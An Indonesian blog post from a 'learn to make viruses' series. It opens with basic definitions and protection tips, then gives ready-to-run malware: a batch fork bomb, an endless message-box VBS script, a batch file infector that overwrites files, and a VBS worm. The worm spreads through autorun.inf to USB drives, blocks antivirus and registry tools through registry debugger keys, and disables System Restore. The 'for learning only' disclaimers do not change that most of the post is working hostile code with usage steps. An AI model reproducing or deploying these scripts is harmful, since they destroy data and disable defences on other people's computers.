Showing posts with label Belajar Buat Virus. Show all posts
Showing posts with label Belajar Buat Virus. Show all posts


Pengertian
Virus : Suatu program yang dapat menginfeksi program lain dengan cara mengkopikan bagian dirinya ke dalam program yang diinfeksi. Virus dapat menyebar dengan menggunakan otorisasi dari setiap user yang menggunakan program terinfeksi. Setiap program yang telah terinfeksi dapat berkelakuan sebagai virus. ( Fred Cohen )
Worm : Suatu Program yang mengkopi dirinya sendiri ke HANYA memory komputer. Perbedaan mendasar dari worm dan virus adalah, apakah menginfeksi target code atau tidak. Virus menginfeksi target code, tetapi worm tidak. Worm hanya berada di memory.
Trojan : Trojan Horse diproduksi dengan tujuan jahat. Berbeda dengan virus, Trojan Horse tidak dapat memproduksi diri sendiri. Pada umumnya, mereka dibawa oleh utility program lainnya. Utility program tersebut mengandung dirinya, atau Trojan Horse itu sendiri ber"lagak" sebagai utility program.




Jenis-Jenis Virus
Virus Makro (ditulis dengan bahasa program aplikasi, misal Word)
Virus Boot Sector (memindahkan atau menggantikan boot sector asli dengan program booting virus)
Stealth Virus (menguasai tabel interrupt pada DOS, berkemampuan untuk mengendalikan instruksi level DOS dan biasanya tersembunyi)
Polymorphic virus (dirancang mengecoh program antivirus dengan cara selalu merubah strukturnya setiap kali selesai menginfeksi file)
Virus file/program (menginfeksi file-file yang dapat dieksekusi langsung dari sistem operasi)
Multipartition Virus (Virus ini merupakan gabungan dari virus boot sector dan virus file)
Kriteria Virus
Kemampuan untuk mendapatkan informasi
Kemampuan untuk memeriksa suatu file
Kemampuan untuk menggandakan diri dan menularkan diri
Kemampuan melakukan manipulasi
Kemampuan untuk menyembunyikan diri
Media Penyebaran Virus
Disket, media storage R/W
Jaringan ( LAN, WAN,dsb)
WWW (internet)
Software yang Freeware, Shareware atau bahkan Bajakan
Attachment pada email, transfering file
Pengamanan
-          Gunakan antivirus yang anda percayai dengan update terbaru.
-          Selalu scanning semua media penyimpanan eksternal yang akan digunakan.
-          Jika anda terhubung langsung ke Internet cobalah untuk mengkombinasikan antivirus anda dengan Firewall, Anti-spamming, dsb.
-          Selalu waspada terhadap fle-file yang mencurigakan, contoh : file dengan 2 buah exstension atau file executable yang terlihat mencurigakan.
-          Untuk software freeware + shareware, ada baiknya anda mengambilnya dari situs resminya.
-          Pisahkan Lokasi data dengan program (sebaiknya antara drive berisi data benar-benar terpisah dari program, misalnya jangan dicampur dengan folder yang berisi master program)
-          Pasang program pengembali setting Sistem Operasi otomatis (misal deepfreeze)
Membuat  Virus Komputer Hang
Sebelumnya saya ingatkan…!!!
“Segala bentuk atau tutorial disini memang bias dikatakan sangat berbahaya, namun apa yang saya posting ini hanya bersifat untuk pembelajaran dan pengetahuan tentang sekilas pembuatan virus”
Postingan ini cukup menakutkan..hehe (tapi tenang saja)..
Oke.. kita mulai saja langkah-langkahnya..
Buka Notepad anda (kalau maucepet “tekan Windows+R ketikkan Notepad lalu Enter”
Copy script warna Merah dibawah ini. Atou anda bias tulis ulang
--------------INI SCRIPNYA-------------
@echo off
Start
:1
Start
Goto :1
----------DIKIT SEKALI--------
----------TAPI HASILNYA BANYAK HEE----------
Selanjutnya,. SAVE dalam bentuk exstensi .BAT
Penjelasan :
@echo off       : Untuk Menyembunyikan Script
Start                : Untuk Memulai Program CMD
Goto                : Untuk Menuju Suatu Perintah
:1                     : Variable


..? Kira-kira Seperti ini dalam bentuk Notepad (Fontnya Terserah Anda)

Dan Hasilnya akan Seperti ini…(Perlu Diingat, Hasilnya akan membuat computer anda Hang dan lambat-selambatnya), Solusinya Agar Komputer tidak hank lagi adalah.. Tekan Tombol ON-OFF/RESTAR,. Hehe,

Udah capek-capek ngidupin Restar lagi…
Jika Terjadi Problem “Tanggung Jawab Anda”…hiks-hiks-hiks
Membuat Virus Berupa Messege Box
Uah-uah “Tau g’ teman-teman” Virus Kali ini Tidak membahayakan tapi menyebalkan, bisa-bisa Laptopnya dibanting abis-abisan.. nih saya kasih scripnya… dikit ko..

do
msgbox"komputer anda terkena serangan kami",vbokonly+vbinformation,"hxhacker"
loop

Simpan dengan Format .VBS
Udah Itu Aja.. Semoga Bermanfaat…
Hampir Lupa Langkah-langkahnya..
Buka Notepad Anda Copy-Paste Script Yang Berwarna Merah, SAVE dengan Format .VBS
..? kira-kira Seperti ini


“Perhatikan KATA-komputer anda terkena serangan kami-, Bisa Anda ganti dengan pesan apapun, terserah Saudara

Hasilnya Akan Seperti Ini..



Setelah Pesan pertama muncul klik OK, Pesan kedua muncul OK, sampai Takterhingga,
Jjika anda Klik Close Sama saja, jika anda End Tesk lewat TaksManager, Ora Iso,
Solusinya adalah RESTAR/ON-OFF Laptop Anda..

Virus ini adalah merusakkan file dengan mengubah semua file menjadi ekstensi .bat. dan file yang telah berubah secara permanen akan rusak dan tidak dapat dikembalikan..
berikut adalah script virus berekstensi .bat.

@echo off
::virus H1N1
::Code in Gorontalo @ Juny 06 1990
::Using H1N1 tech
set r=set
set s=attrib
goto 4people
:1
%r% n=ren
%r% ok=*.bat
goto 2
:Gorontalo
%r% d=do
%r% k=copy
goto infek
:infek2
%v% %%a %sa% (%ri%) %d% %k% %0 "%%a"
goto 1
:2
%v% %%a %sa% (%ri%) %d% %n% %ri% %ok%
goto finish
:4people
%r% v=for
%r% sa=in
%r% ri=*.*
goto Gorontalo
:infek
%v% %%a %sa% (%ri%) %d% %s% "%%a" -s -r -h
goto infek2
:finish
pause



*jangan mencoba virus ini di dalam folder yang terdapat data-data penting anda. karena baginya, tiada ampun bagi semua file yang ada di dalam. karena otomatis akan rusak dan tidak dapat dikembalikan lagi.!!


--Perlu Diingat.. Contoh Virus yang diposting ini hanya untuk pengetahuan atau pembelajaran, bukan untuk menyerang,. hehe..


Monggo' di Coba . .?
"gunakan script ini hanya untuk tujuan pembelajaran. Bukan untuk merusak, bila anda ingin melihat kemampuannya, silahkan aktifkan di komputer anda sendiri. Jangan di komputer orang lain. Saya tidak bertanggung jawab atas kerusakan yang di buat oleh virus ini."

Pertama-tama buka notepad, kemudian copas (copy-paste) script di bawah ini kedalam notepad, kemudian simpan dengan format vhck3d.vbs dimulai dari on error resume next

-------------------------script begin--------------------------
On error resume next
Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd
'Siapkan isi autorun atau bahasa kerennya make the autorun
Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dini = dini & text.readline
Dini = dini & vbcrlf
Loop
Do

'Buat file induk bahasa coolnya prepare the mother

Set i = you.getspecialfolder(0)
Set jatiya = you.getspecialfolder(1)
Set tf = you.getfile(jatiya & "hck3d.vbs")
Tf.attributes = 32
Set tf = you.createtextfile(jatiya & "hck3d.vbs",2,true)

Tf.write dini

Tf.close

Set tf = you.getfile(jatiya & "hck3d.vbs")
Tf.attributes = 39

'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya

For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set tf=you.getfile(loph.path &"vhck3d.sys.vbs")
Tf.attributes =32
Set tf=you.createtextfile(loph.path &"vhck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf=you.getfile(loph.path &"vhck3d.vbs")
Tf.attributes = 39
Set tf =you.getfile(loph.path &"autorun.inf")
Tf.attributes = 32
Set tf=you.createtextfile(loph.path &"autorun.inf",2,true)
Tf.write isi
Tf.close
Set tf = you.getfile(loph.path &"autorun.inf")
Tf.attributes=39
End if

Next

'Manipulasi registry

Set vhck3d = createobject("wscript.shell")

'Sudah Terlihat Jelas , Virus Ini Bermain Regedit Kita

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsmsconfig.exedebugger",""

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsregedit.exedebugger",""

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsregedt32.exedebugger",""

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsregistryeditor.exedebugger",""

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionssetup.exedebugger",""

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsavscan.exedebugger",""

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsavcenter.exedebugger",""

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsashavast.exedebugger",""

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsansav.exedebugger",""

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsviremoval.exedebugger",""

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsviremover.exedebugger",""

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionspcmav-cln.exe.exedebugger",""

Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticecaption", "my loph dini"

Vhck3d.regwrite "hkey_local_machinesoftwarepoliciesmicrosoftwindowsinstallerlimitsystemrestorecheckpointing", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machinesoftwarepoliciesmicrosoftwindowsinstallerdisablemsi", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machinesoftwarepoliciesmicrosoftwindows ntsystemrestoredisablesr", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machinesoftwarepoliciesmicrosoftwindows ntsystemrestoredisableconfig", "1", "reg_dword"

If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "explorer.exe /e,/select, " & wscript.scriptfullname

-----------------------end script-----------------------------

Nah itu script untuk yang pertama dan bisa Anda modifikasi sendiri